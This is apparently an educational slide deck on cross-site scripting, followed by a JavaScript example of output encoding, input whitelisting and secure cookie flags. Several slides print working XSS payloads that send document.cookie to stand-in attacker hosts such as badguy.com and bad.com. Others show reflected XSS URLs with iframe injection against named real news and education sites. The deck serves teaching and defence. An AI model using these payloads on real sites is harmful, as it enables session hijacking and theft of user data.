Cross site scripting (xss)

A PowerPoint presentation on the topic of Cross-Site Scripting.

Published in: Education

  1. 1. Cross-site scripting
  2. 2. CROSS-SITE SCRIPTING (XSS)
     • Cross-site scripting (XSS) is defined as a computer security vulnerability (weakness) found in web applications.
     • XSS allows for code injection by malicious web users into Internet pages viewed by other users.
     • In an XSS attack, the attacker gains the ability to see private user IDs, passwords, credit card information and other personal identification.
     2/18/2014
  3. 3. XSS (-ve) effects
     • Stealing other users' cookies
     • Stealing their private information
     • Performing actions on behalf of other users
     • Redirecting to other websites
     • Showing ads in hidden IFRAMEs and popups
  4. 4. Cross Site Scripting Types. Two known types:
     • Reflected (Non-Persistent): link in other website or email
     • Stored (Persistent): forum, bulletin board, feedback form
  5. 5. Reflected (Non-persistent): Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message or on some other web site.
  6. 6. Reflected (Non-Persistent)
     1. Send e-mail with <script> tags embedded in the link: http://mybank.com/account.php?variable=”><script>document.location=’http://www.badguy.com/cgi-bin/cookie.cgi’”%20+document.cookie</script>
     2. The victim follows the link and the script executes (www.badguy.com: cookie collector)
     • Malicious content does not get stored in the server
     • The server bounces the original input to the victim without modification
  7. 7. EXAMPLE
  8. 8. Stored (persistent): In a persistent XSS attack, the XSS code is saved into persistent storage, such as a database, along with other data, and is then visible to other users as well. One example is a blog website, where a hacker can add XSS code along with the comment text; if no validation or filtering is present on the server, the XSS code can be successfully saved into the database. After this, if other users open the page in their browsers, the XSS code can execute and perform a variety of harmful actions. This type of attack is more dangerous, because the hacker can steal cookies and make modifications to the page. The risk with this kind of attack is that any third-party hacker can use the vulnerability to perform actions on behalf of other users. Example: see original post<script>window.location = "http://www.hackers.com?yid=";</script>
  9. 9. Stored (Persistent): public forum web site
     • Attacker: uploads malicious scripting commands to the public forum, for example: Great message! <script> var img=new Image(); img.src="http://www.bad.com/CookieStealer/Form1.aspx?s="+document.cookie; </script>
     • Victim: browses the forum and downloads the malicious code
     • The server stores the malicious content
     • The server serves the malicious content in its original form
  10. 10. EXAMPLE
  17. 17. Who is affected by XSS?
     • The XSS attack's first target is the client
        • Client trusts server (does not expect attack)
        • Browser executes malicious script
     • But the second target is the company running the server
        • Loss of public image (blame)
        • Loss of customer trust
        • Loss of money
  18. 18. CRIMES RELATED TO XSS: XSS vulnerability found on Facebook subdomain (https://developers.facebook.com/), discovered by Mauritania_Attacker (AnonGhost)
  19. 19. Times Now TV & Shiksha Official Websites: a 21-year-old information security expert, Narendra Bhati (R00t Sh3ll The Untracable), from Sheoganj, Rajasthan. Feb 2013. XSS code for TIMES OF INDIA TV: http://www.timesnow.tv/videosearchresult.cms?query="/><iframe+src="http://www.breakthesecurity.com"+width="1000px"+height="1000px"></iframe>&srchcombo=1&x=0&y=0
  20. 20. XSS code for Shiksha.com: http://www.shiksha.com/search/index?keyword="/><iframe+src="http://www.breakthesecurity.com"+width=1000+height=1000></iframe>&start=0&institute_rows=-1&content_rows=1&country_id=&city_id=&zone_id=&locality_id=&course_level=&course_type=&min_duration=&max_duration=&search_type=&search_data_type=&sort_type=&utm_campaign=site_search&utm_medium=internal&utm_source=shiksha&from_page=homepage&autosuggestor_suggestion_shown=5
  21. 21.
     • Client side
        • Cookie security
        • Verify email
        • Always update
     • Server side
        • Input validation (blacklisting vs. whitelisting)
        • Encode all meta characters sent to the client
        • Keep track of user sessions
        • Web application firewall
        • Always test
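
The server-side measures from slide 21 (whitelist input validation, encoding meta characters sent to the client) and the cookie-security item, applied to the reflected pattern described on slides 5 and 6. This is an added example, not part of the original presentation; the function names and the sample input are constructed for illustration.

```javascript
// Added example: all function names and sample inputs are constructed for illustration.

// HTML metacharacters and their entity encodings.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};

// Encode every metacharacter before a value is written into HTML text or a quoted attribute.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Whitelist validation: accept only what a search keyword needs, reject everything else.
function isValidKeyword(value) {
  return typeof value === 'string' && /^[\p{L}\p{N} ._-]{1,64}$/u.test(value);
}

// Vulnerable: request input is bounced back to the client without modification.
function renderSearchPageUnsafe(query) {
  return `<input name="query" value="${query}"><p>Results for ${query}</p>`;
}

// Hardened: validate on input, then encode on output as defence in depth.
function renderSearchPageSafe(query) {
  if (!isValidKeyword(query)) {
    return '<p>Invalid search keyword.</p>';
  }
  const safe = encodeHtml(query);
  return `<input name="query" value="${safe}"><p>Results for ${safe}</p>`;
}

// Cookie security: HttpOnly keeps the cookie out of document.cookie;
// Secure and SameSite restrict when the browser sends it.
function sessionCookie(sessionId) {
  return `sid=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Strict; Path=/`;
}

// Constructed input shaped like the links on the slides: closes the attribute, then opens a tag.
const sample = '"/><iframe src="http://attacker.example"></iframe>';
console.log(renderSearchPageUnsafe(sample)); // markup from the request reaches the page
console.log(encodeHtml(sample));             // the same input as inert text
console.log(renderSearchPageSafe(sample));   // rejected by the whitelist
console.log(sessionCookie('abc123'));
```

Whitelisting alone is not enough for fields that must accept free text, such as forum comments; there the output encoding is what keeps stored input from executing.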